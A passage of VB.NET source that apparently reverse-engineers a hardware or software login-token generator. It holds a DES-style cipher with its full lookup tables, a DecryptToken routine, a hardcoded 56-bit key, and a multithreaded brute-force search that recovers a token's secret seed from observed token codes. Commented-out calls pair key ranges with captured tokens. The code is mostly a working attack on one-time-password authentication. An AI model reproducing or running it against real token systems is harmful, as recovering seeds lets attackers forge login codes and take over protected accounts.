Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key4_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key4_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key4_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key2_Source.Clone, Key4_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key1_Enigma.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key1_Enigma.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key1_Enigma.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key2_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key2_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key2_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key3_Logic.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key3_Logic.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key3_Logic.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key3_Logic.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key4_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key4_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key4_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key3_Logic.Clone, Key4_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key1_Enigma.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key1_Enigma.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key1_Enigma.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key1_Enigma.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key2_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key2_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key2_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key2_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key3_Logic.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key3_Logic.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key3_Logic.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key3_Logic.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine

Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key4_Source.Clone, Key1_Enigma.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key4_Source.Clone, Key2_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key4_Source.Clone, Key3_Logic.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.Write(DecryptToken(Token, Test(Key4_Source.Clone, Key4_Source.Clone, Key4_Source.Clone, Direction, PinCode, EncType), Host, AlgoVer) & Chr(9)) Console.WriteLine Console.WriteLine

'Console.ReadLine 'End

Console.WriteLine("Decrypted Counter: " & DecryptToken(TokenToInt("0C692F"), &HA6A99E0EDA147A, 1, 1)) Console.WriteLine("Decrypted Counter: " & DecryptToken(TokenToInt("H6909C"), &HA6A99E0EDA147A, 1, 2)) Console.WriteLine("Decrypted Counter: " & DecryptToken(TokenToInt("87E59C"), &HA6A99E0EDA147A, 1, 2)) Console.WriteLine

Dim TimeElapsed As Date = Now Console.WriteLine(Format(TimeElapsed.Now, "dd/MMM/yyyy") & " " & Format(TimeElapsed.Now, "HH:mm:ss") & ":" & Format(TimeElapsed.Millisecond, "000") & " BruteForce: Started") Console.WriteLine

Dim ThreadCount As Integer = 16 Dim BruteForceThread(ThreadCount) As Threading.Thread

'Dim I As Integer

BruteForceKeyStart(0) = &HA6A99E0E000000 BruteForceKeyStart(1) = 1

'Dim BruteForceThread(ThreadCount) As Threading.Thread

For I = 0 To ThreadCount BruteForceThread(I) = New Threading.Thread(AddressOf BruteForceSub) BruteForceThread(I).Priority = Threading.ThreadPriority.Highest BruteForceThread(I).Start Next

'Do While BruteForceKeyStart(1) <= 1 'Threading.Thread.Sleep(100) 'Loop

'Do While BruteForceKeyStart(1) > 1 'Threading.Thread.Sleep(10000) 'Loop

Console.WriteLine Console.WriteLine(Format(Now.Now, "dd/MMM/yyyy") & " " & Format(Now.Now, "HH:mm:ss") & ":" & Format(Now.Millisecond, "000") & " BruteForce: Ended") Console.WriteLine("Time Elapsed: " & DateDiff(DateInterval.Second, TimeElapsed, Now) & " Seconds") Console.WriteLine

Console.WriteLine("Thread work completed, press ENTER to exit") Console.ReadLine

'Dim I, J As Integer 'Dim L As Long 'For L = 0 To &HFFFFFFFFFFFFFF ' I = DecryptToken("HH997P", L, 1, 2) ' If I < 1000 Then ' If I + 1 = DecryptToken("A4PCF4", L, 1, 2) Then '  Console.WriteLine '  Console.WriteLine(Hex(L)) ' End If  ' Else ' If L Mod &H10000 = 0 Then Console.Write(".") ' End If 'Next

'

'Dim D As Long 'Dim S As String 'For D = &HA6A99E0EDA147A To &HA6A99E0EDA147A ' For I = 0 To 20 ' S = Hex(GenerateTokenFromKey(D, I, 9, 1, False)).Replace("B", "H").Replace("D", "P") ' 'If S = "152154" Then MsgBox("Y") ' Console.WriteLine(Hex(D) & ": " & S)  ' Next 'Next

'Console.ReadLine 'End

'MsgBox(Hex(DecryptTest(&HA65466C0ECD050F6, &HF1502C60CF818A8B))) 'End

'Dim X As Byte = genEs("A6A99E0EDA147A") 'End

'Dim X1 As Byte = {256 - 1, 69, 110, 105, 103, 109, 97, 256 - 128} 'Dim X2 As Byte = {256 - 1, 76, 111, 103, 105, 99, 44, 256 - 128} 'Dim X3 As Byte = {3, 256 - 50, 74, 256 - 93, 86, 119, 256 - 14, 256 - 111} 'Dim X4 As Byte = {256 - 127, 53, 256 - 16, 20, 29, 256 - 68, 256 - 24, 98} 'MsgBox(Hex2Char(X1, 16) & ", " & Hex2Char(X2, 16) & ", " & Hex2Char(X3, 16) & ", " & Hex2Char(X4, 16)) 'End

'BruteForceKey(&HE63F020F359FEA, &HE63F020F359FEC, "223P09", 1000) 'BruteForceKey(&H3B9D3CE3000000, &H3B9D3CE4000000, "6H40FH", 1000) 'BruteForceKey(&HBCA71305AB38F0, &HBCA71305AB38F1, "A53PP3", &HFFFFF)

'BruteForceKey(&HA6A99E0EDA147B, &HA6A99E0EDA1480, "268ACF", 10, 1) 'BruteForceKey(&HA6A99E0EDA147B, &HA6A99E0EDA1480, "F5HAC5", 10, 2)

'Console.WriteLine("T: " & Hex(GenerateTokenFromKey(&HA6A99E0EDA147A, 22, 0, True)))

'Console.WriteLine("H1: 268ACF, H2: F5HAC5, H3: E44029, H4:H9F518, H5: 4P1850") 'Console.WriteLine

'Console.WriteLine(Hex(GenerateTokenFromKey(&H1, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H10, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H100, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H1000, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H10000, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H100000, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H1000000, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H10000000, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H100000000, 0, 0, True)))

'Console.WriteLine

'Console.WriteLine(Hex(GenerateTokenFromKey(&H100000000000000 - 1, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H1000000000000 - 1, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H10000000000 - 1, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H100000000 - 1, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H1000000 - 1, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H10000 - 1, 0, 0, True))) 'Console.WriteLine(Hex(GenerateTokenFromKey(&H100 - 1, 0, 0, True)))

'Dim D As Long 'Dim S As String 'For D = &HA6A99E0EDA147B To &HA6A99E0EDA147B ' For I = 0 To 20 ' S = Hex(GenerateTokenFromKey(D, I, 0)).Replace("B", "H").Replace("D", "P") ' If S = "F5HAC5" Then MsgBox("Y") ' Console.WriteLine(Hex(D) & ": " & S)  ' Next 'Next

'For I = 0 To 20 'Console.Write(Format(I, "00000") & ": " & GenerateUserToken("0000", I, 6, DecryptedKey)) : Console.WriteLine(", Key: " & DecryptedKey) 'Next

'Console.Write(GenerateUserToken("0001", &H0, 6, DescryptedKey)) : Console.WriteLine("Key: " & DecryptedKey) 'Console.WriteLine(GenerateUserToken("0000", &H1000000, 6, DecryptedKey)) 'Console.WriteLine(GenerateUserToken("0000", &H2000000, 6, DecryptedKey))

'For I = 0 To 20 'Console.Write(Format(I, "00000") & ": " & GenerateUserToken("0000", I, 6, DecryptedKey, 3)) 'Console.WriteLine(", Key: " & DecryptedKey) 'Next

'Console.ReadLine

End Sub End Module

'===================================================================================================================================================================================================== ' 2: MOD SERVER (This will authenticate a login-token), you can call the DecryptToken function to decrypt a Token code against a key, examples can be found under ModMain. '===================================================================================================================================================================================================== Module modServer

Dim e As Byte = {128, 64, 32, 16, 8, 4, 2, 1}
 * 1) Region "Encryption Arrays"

Dim h As Byte = { _ 56, 48, 40, 32, 24, 16, 8, 0, 57, 49, _    41, 33, 25, 17, 9, 1, 58, 50, 42, 34, _     26, 18, 10, 2, 59, 51, 43, 35, 62, 54, _     46, 38, 30, 22, 14, 6, 61, 53, 45, 37, _     29, 21, 13, 5, 60, 52, 44, 36, 28, 20, _     12, 4, 27, 19, 11, 3 _ }

Dim f As Byte = { _ 13, 16, 10, 23, 0, 4, 2, 27, 14, 5, _    20, 9, 22, 18, 11, 3, 25, 7, 15, 6, _     26, 19, 12, 1, 40, 51, 30, 36, 46, 54, _     29, 39, 50, 44, 32, 47, 43, 48, 38, 55, _     33, 52, 45, 41, 49, 35, 28, 31 _ }

Dim c As Integer = {&H800000, &H400000, &H200000, &H100000, &H80000, &H40000, &H20000, &H10000, 32768, 16384, 8192, 4096, 2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1}

Dim i As Integer = {1, 2, 4, 6, 8, 10, 12, 14, 15, 17, 19, 21, 23, 25, 27, 28}

Dim b As Integer = { _ &H1010400, 0, &H10000, &H1010404, &H1010004, &H10404, 4, &H10000, 1024, &H1010400, _ &H1010404, 1024, &H1000404, &H1010004, &H1000000, 4, 1028, &H1000400, &H1000400, &H10400, _ &H10400, &H1010000, &H1010000, &H1000404, &H10004, &H1000004, &H1000004, &H10004, 0, 1028, _ &H10404, &H1000000, &H10000, &H1010404, 4, &H1010000, &H1010400, &H1000000, &H1000000, 1024, _ &H1010004, &H10000, &H10400, &H1000004, 1024, 4, &H1000404, &H10404, &H1010404, &H10004, _ &H1010000, &H1000404, &H1000004, 1028, &H10404, &H1010400, 1028, &H1000400, &H1000400, 0, _ &H10004, &H10400, 0, &H1010004 _ }

Dim a As Integer = { _ &H80108020, &H80008000, 32768, &H108020, &H100000, 32, &H80100020, &H80008020, &H80000020, &H80108020, _ &H80108000, &H80000000, &H80008000, &H100000, 32, &H80100020, &H108000, &H100020, &H80008020, 0, _ &H80000000, 32768, &H108020, &H80100000, &H100020, &H80000020, 0, &H108000, 32800, &H80108000, _ &H80100000, 32800, 0, &H108020, &H80100020, &H100000, &H80008020, &H80100000, &H80108000, 32768, _ &H80100000, &H80008000, 32, &H80108020, &H108020, 32, 32768, &H80000000, 32800, &H80108000, _ &H100000, &H80000020, &H100020, &H80008020, &H80000020, &H100020, &H108000, 0, &H80008000, 32800, _ &H80000000, &H80100020, &H80108020, &H108000 _ }

Dim o As Integer = { _ 520, &H8020200, 0, &H8020008, &H8000200, 0, &H20208, &H8000200, &H20008, &H8000008, _ &H8000008, &H20000, &H8020208, &H20008, &H8020000, 520, &H8000000, 8, &H8020200, 512, _ &H20200, &H8020000, &H8020008, &H20208, &H8000208, &H20200, &H20000, &H8000208, 8, &H8020208, _ 512, &H8000000, &H8020200, &H8000000, &H20008, 520, &H20000, &H8020200, &H8000200, 0, _ 512, &H20008, &H8020208, &H8000200, &H8000008, 512, 0, &H8020008, &H8000208, &H20000, _ &H8000000, &H8020208, 8, &H20208, &H20200, &H8000008, &H8020000, &H8000208, 520, &H8020000, _ &H20208, 8, &H8020008, &H20200 _ }

Dim n As Integer = { _ &H802001, 8321, 8321, 128, &H802080, &H800081, &H800001, 8193, 0, &H802000, _ &H802000, &H802081, 129, 0, &H800080, &H800001, 1, 8192, &H800000, &H802001, _ 128, &H800000, 8193, 8320, &H800081, 1, 8320, &H800080, 8192, &H802080, _ &H802081, 129, &H800080, &H800001, &H802000, &H802081, 129, 0, 0, &H802000, _ 8320, &H800080, &H800081, 1, &H802001, 8321, 8321, 128, &H802081, 129, _ 1, 8192, &H800001, 8193, &H802080, &H800081, 8193, 8320, &H800000, &H802001, _ 128, &H800000, 8192, &H802080 _ }

Dim m As Integer = { _ 256, &H2080100, &H2080000, &H42000100, &H80000, 256, &H40000000, &H2080000, &H40080100, &H80000, _ &H2000100, &H40080100, &H42000100, &H42080000, &H80100, &H40000000, &H2000000, &H40080000, &H40080000, 0, _ &H40000100, &H42080100, &H42080100, &H2000100, &H42080000, &H40000100, 0, &H42000000, &H2080100, &H2000000, _ &H42000000, &H80100, &H80000, &H42000100, 256, &H2000000, &H40000000, &H2080000, &H42000100, &H40080100, _ &H2000100, &H40000000, &H42080000, &H2080100, &H40080100, 256, &H2000000, &H42080000, &H42080100, &H80100, _ &H42000000, &H42080100, &H2080000, 0, &H40080000, &H42000000, &H80100, &H2000100, &H40000100, &H80000, _ 0, &H40080000, &H2080100, &H40000100 _ }

Dim l As Integer = { _ &H20000010, &H20400000, 16384, &H20404010, &H20400000, 16, &H20404010, &H400000, &H20004000, &H404010, _ &H400000, &H20000010, &H400010, &H20004000, &H20000000, 16400, 0, &H400010, &H20004010, 16384, _ &H404000, &H20004010, 16, &H20400010, &H20400010, 0, &H404010, &H20404000, 16400, &H404000, _ &H20404000, &H20000000, &H20004000, 16, &H20400010, &H404000, &H20404010, &H400000, 16400, &H20000010, _ &H400000, &H20004000, &H20000000, 16400, &H20000010, &H20404010, &H404000, &H20400000, &H404010, &H20404000, _ 0, &H20400010, 16, 16384, &H20400000, &H404010, 16384, &H400010, &H20004010, 0, _ &H20404000, &H20000000, &H400010, &H20004010 _ }

Dim j As Integer = { _ &H200000, &H4200002, &H4000802, 0, 2048, &H4000802, &H200802, &H4200800, &H4200802, &H200000, _ 0, &H4000002, 2, &H4000000, &H4200002, 2050, &H4000800, &H200802, &H200002, &H4000800, _ &H4000002, &H4200000, &H4200800, &H200002, &H4200000, 2048, 2050, &H4200802, &H200800, 2, _ &H4000000, &H200800, &H4000000, &H200800, &H200000, &H4000802, &H4000802, &H4200002, &H4200002, 2, _ &H200002, &H4000000, &H4000800, &H200000, &H4200800, 2050, &H200802, &H4200800, 2050, &H4000002, _ &H4200802, &H4200000, &H200800, 0, 2, &H4200802, 0, &H200802, &H4200000, 2048, _ &H4000002, &H4000800, 2048, &H200002 _ }

Dim g As Integer = { _ &H10001040, 4096, &H40000, &H10041040, &H10000000, &H10001040, 64, &H10000000, &H40040, &H10040000, _ &H10041040, &H41000, &H10041000, &H41040, 4096, 64, &H10040000, &H10000040, &H10001000, 4160, _ &H41000, &H40040, &H10040040, &H10041000, 4160, 0, 0, &H10040040, &H10000040, &H10001000, _ &H41040, &H40000, &H41040, &H40000, &H10041000, 4096, 64, &H10040040, 4096, &H41040, _ &H10001000, 64, &H10000040, &H10040000, &H10040040, &H10000000, &H40000, &H10001040, 0, &H10041040, _ &H40040, &H10000040, &H10040000, &H10001000, &H10001040, 0, &H10041040, &H41000, &H41000, 4160, _ 4160, &H40040, &H10000000, &H10041000 _ }
 * 1) End Region

Private Function ServerEncrypt(ByRef KeyData As Long, ByVal EncryptionArray As Integer) As Long Dim TempResult As Long

Dim KeySplitter As String = Hex(KeyData) KeySplitter = Mid("0000000000000000", 1, 16 - Len(KeySplitter)) & KeySplitter Dim L1 As Integer = Val("&H" & Mid(KeySplitter, 1, 8)) Dim K1 As Integer = Val("&H" & Mid(KeySplitter, 9, 8))

Dim J1 As Integer Dim I As Integer Dim J2 As Integer Dim I1 As Integer

J1 = ((L1 >> 4 And &HFFFFFFF) Xor K1) And &HF0F0F0F K1 = (K1 Xor J1) L1 = (L1 Xor J1 << 4) J1 = ((L1 >> 16 And &HFFFF) Xor K1) And &HFFFF K1 = (K1 Xor J1) L1 = (L1 Xor J1 << 16) J1 = (((K1 >> 2 And &H3FFFFFFF) Xor L1) And &H33333333) L1 = (L1 Xor J1) K1 = (K1 Xor J1 << 2) J1 = (((K1 >> 8 And &HFFFFFF) Xor L1) And &HFF00FF) L1 = (L1 Xor J1) K1 = (K1 Xor J1 << 8) K1 = (K1 << 1 Or K1 >> 31 And 1) J1 = ((L1 Xor K1) And &HAAAAAAAA) L1 = (L1 Xor J1) K1 = (K1 Xor J1) L1 = (L1 << 1 Or L1 >> 31 And 1)

For I = 0 To 7 J1 = K1 << 28 Or (K1 >> 4 And &HFFFFFFF) J1 = J1 Xor EncryptionArray(J2) J2 = J2 + 1 I1 = j(J1 And &H3F) I1 = I1 Or m((J1 >> 8 And &HFFFFFF) And &H3F) I1 = I1 Or o((J1 >> 16 And &HFFFF) And &H3F) I1 = I1 Or b((J1 >> 24 And &HFF) And &H3F) J1 = K1 Xor EncryptionArray(J2) J2 = J2 + 1 I1 = I1 Or g(J1 And &H3F) I1 = I1 Or l((J1 >> 8 And &HFFFFFF) And &H3F) I1 = I1 Or n((J1 >> 16 And &HFFFF) And &H3F) I1 = I1 Or a((J1 >> 24 And &HFFF) And &H3F) L1 = L1 Xor I1  J1 = L1 << 28 Or (L1 >> 4 And &HFFFFFFF) J1 = J1 Xor EncryptionArray(J2) J2 = J2 + 1 I1 = j(J1 And &H3F) I1 = I1 Or m((J1 >> 8 And &HFFFFFF) And &H3F) I1 = I1 Or o((J1 >> 16 And &HFFFF) And &H3F) I1 = I1 Or b((J1 >> 24 And &HFF) And &H3F) J1 = L1 Xor EncryptionArray(J2) J2 = J2 + 1 I1 = I1 Or g(J1 And &H3F) I1 = I1 Or l((J1 >> 8 And &HFFFFFF) And &H3F) I1 = I1 Or n((J1 >> 16 And &HFFFF) And &H3F) I1 = I1 Or a((J1 >> 24 And &HFF) And &H3F) K1 = K1 Xor I1 Next

K1 = K1 << 31 Or (K1 >> 1 And &H7FFFFFFF) J1 = (L1 Xor K1) And &HAAAAAAAA L1 = L1 Xor J1 K1 = K1 Xor J1  L1 = L1 << 31 Or (L1 >> 1 And &H7FFFFFFF) J1 = ((L1 >> 8 And &HFFFFFF) Xor K1) And &HFF00FF K1 = K1 Xor J1 L1 = L1 Xor J1 << 8 J1 = ((L1 >> 2 And &H3FFFFFFF) Xor K1) And &H33333333 K1 = K1 Xor J1 L1 = L1 Xor J1 << 2 J1 = ((K1 >> 16 And &HFFFF) Xor L1) And &HFFFF L1 = L1 Xor J1 K1 = K1 Xor J1 << 16 J1 = ((K1 >> 4 And &HFFFFFFF) Xor L1) And &HF0F0F0F L1 = L1 Xor J1 K1 = K1 Xor J1 << 4

TempResult = K1 TempResult = TempResult << 32 TempResult = TempResult Or (L1 And &H10000000FFFFFFFF And &H1000000FFFFFFFF)         ' The FUCKING VB, wont AND &HFFFFFFFF12345678 with &H00000000FFFFFFFF, it would keep the same fucking FF's in the upper 32-bit bytes!

ServerEncrypt = TempResult End Function

Private Function DecryptTest(ByVal SourceKey As Long, ByVal EncryptedSentence As Long) As Long Dim KeyS As String = Hex(SourceKey) Dim SenS As String = Hex(EncryptedSentence)

KeyS = Mid("0000000000000000", 1, 16 - Len(KeyS)) & KeyS SenS = Mid("0000000000000000", 1, 16 - Len(SenS)) & SenS

Dim KeyB As Byte = ConvertHexStringToBytes(KeyS) Dim SenB As Byte = ConvertHexStringToBytes(SenS)

Dim Result As Byte = EncryptDecryptToken(KeyB, SenB, 8, 0)

DecryptTest = Bytes2Long(Result) End Function

Private Function Scramble_A(ByVal OriginalKey As Byte, ByVal Direction As Integer) As Integer Dim ai1(56 - 1) As Integer 'int ai1[] = new int[56]; Dim ai2(56 - 1) As Integer 'int ai2[] = new int[56]; Dim ai3(32 - 1) As Integer 'int ai3[] = new int[32];

Dim I1, J1, K1 As Integer Dim DirectionCounter As Integer Dim By2 As Byte

For I1 = 0 To 55 If (OriginalKey((h(I1) >> 3 And &H1F)) And e(h(I1) And 7)) = 0 Then ai1(I1) = 0 Else ai1(I1) = 1 End If Next

For I1 = 0 To 15 If Direction = 1 Then DirectionCounter = I1 << 1 Else DirectionCounter = 15 - I1 << 1 End If

'ai3(DirectionCounter) = ai3(DirectionCounter + 1) = 0 ai3(DirectionCounter) = 0 ai3(DirectionCounter + 1) = 0

For J1 = 0 To 27 K1 = J1 + i(I1) If K1 >= 28 Then K1 = K1 - 28 ai2(J1) = ai1(K1) Next

For J1 = 28 To 55 K1 = J1 + i(I1) If K1 >= 56 Then K1 = K1 - 28 ai2(J1) = ai1(K1) Next

For J1 = 0 To 23 If ai2(f(J1)) <> 0 Then ai3(DirectionCounter) = ai3(DirectionCounter) Or c(J1) If ai2(f(J1 + 24)) <> 0 Then ai3(DirectionCounter + 1) = ai3(DirectionCounter + 1) Or c(J1) Next Next

Scramble_A = Scramble_A2(ai3.Clone) End Function

Private Function Scramble_A2(ByVal SourceArray As Integer) As Integer Dim I As Integer Dim J As Integer = 0 Dim K As Integer = 0

Dim TempBuffer(31) As Integer J = 0 K = 0

For I = 0 To 15 TempBuffer(K) = (SourceArray(J) And &HFC0000) << 6 TempBuffer(K) = TempBuffer(K) Or (SourceArray(J) And &HFC0) << 10 TempBuffer(K) = TempBuffer(K) Or ((SourceArray(J + 1) And &HFC0000) >> 10 And &H3FFFFF) TempBuffer(K) = TempBuffer(K) Or ((SourceArray(J + 1) And &HFC0) >> 6 And &H3FFFFFF) K = K + 1 TempBuffer(K) = (SourceArray(J) And &H3F000) << 12 TempBuffer(K) = TempBuffer(K) Or (SourceArray(J) And &H3F) << 16 TempBuffer(K) = TempBuffer(K) Or ((SourceArray(J + 1) And &H3F000) >> 4 And &HFFFFFFF) TempBuffer(K) = TempBuffer(K) Or SourceArray(J + 1) And &H3F K = K + 1 J = J + 2 Next

Scramble_A2 = TempBuffer End Function

Public Function DecryptToken(ByVal Token As Integer, ByVal OriginalKey As Long, ByVal Host As Integer, ByVal AlgoVer As Integer) As Integer Dim d As Integer Dim k As Integer

Token = Token + &H1000000 Token = Token * &H10 Dim TokB(3) As Byte '= ConvertHexStringToBytes(Token)

TokB(0) = (Token >> 24) And &HFF TokB(1) = (Token >> 16) And &HFF TokB(2) = (Token >> 8) And &HFF TokB(3) = (Token) And &HFF

Dim I As Integer Dim S, HostDisplacement As String Dim WorkingByte As Integer = 0

Dim KeyB7 As Byte = _ { _      (OriginalKey >> &H30) And &HFF _ , (OriginalKey >> &H28) And &HFF _ , (OriginalKey >> &H20) And &HFF _ , (OriginalKey >> &H18) And &HFF _ , (OriginalKey >> &H10) And &HFF _ , (OriginalKey >> &H8) And &HFF _ , (OriginalKey >> &H0) And &HFF _ }

I = KeyB7(6) KeyB7(6) = ((I + Host) And &HF) Or (I And &HF0)

Dim KeyB8 As Byte = Convert7to8ByteArray(KeyB7) d = Scramble_A(KeyB8, 1) k = Scramble_A(KeyB8, 0)

HostDisplacement = "" For I = 0 To 6 S = Hex(KeyB7(I)) S = Mid("00", 1, 2 - Len(S)) & S

HostDisplacement = HostDisplacement & S Next

HostDisplacement = Mid(HostDisplacement & HostDisplacement, Host, 14) Dim DecryptionKey As Long = 0

For I = 1 To Len(HostDisplacement) DecryptionKey = (DecryptionKey << 4) Or Val("&H" & Mid(HostDisplacement, I, 1)) Next

Dim DecryptionKey1 As Long

If AlgoVer = 1 Then DecryptionKey1 = ((DecryptionKey And &HFFFFFFFFFFFFF) << 8) Or ((DecryptionKey >> 48)) Or (CType(TokB(0), Long) << 60) Else

DecryptionKey1 = ((DecryptionKey And &HFFFFFFFFFFFFFF) << 8) Or ((DecryptionKey And &HF000000000000) >> 48) Or (TokB(0) And &HF) << 4 End If

Dim DecryptionKey2 As Long = (DecryptionKey1 And &HFFFFFFFFFFFFFF) << 8 Or TokB(1) Dim DecryptionKey3 As Long = (DecryptionKey2 And &HFFFFFFFFFFFFFF) << 8 Or TokB(2) Dim DecryptionKey4 As Long = (DecryptionKey3 And &HFFFFFFFFFFFFFF) << 8 Or TokB(3)

Dim EncCode1 As Long = ServerEncrypt(DecryptionKey1, d) Dim EncCode2 As Long = ServerEncrypt(DecryptionKey2, d)  Dim EncCode3 As Long = ServerEncrypt(DecryptionKey3, d)  Dim EncCode4 As Long = ServerEncrypt(DecryptionKey4, d)

Dim C1 As Byte = (EncCode1 >> 56) And &HFF Xor TokB(1) Dim C2 As Byte = (EncCode2 >> 56) And &HFF Xor TokB(2) Dim C3 As Byte = (EncCode3 >> 56) And &HFF Xor TokB(3) Dim C4 As Byte = (EncCode4 >> 56) And &HFF Xor 0

Dim DecryptedCounter As Long = C3 And &HF0 DecryptedCounter = (DecryptedCounter << 0) Or (C2 And &HF) DecryptedCounter = (DecryptedCounter << 4) Or (C2 >> 4 And &HF) DecryptedCounter = (DecryptedCounter << 4) Or (C1 And &HF) DecryptedCounter = (DecryptedCounter << 4) Or (C1 >> 4 And &HF)

DecryptToken = DecryptedCounter And &HFFFFF End Function

Public Sub Server_Save_Arrays Dim FileHandle As Integer = FileSystem.FreeFile

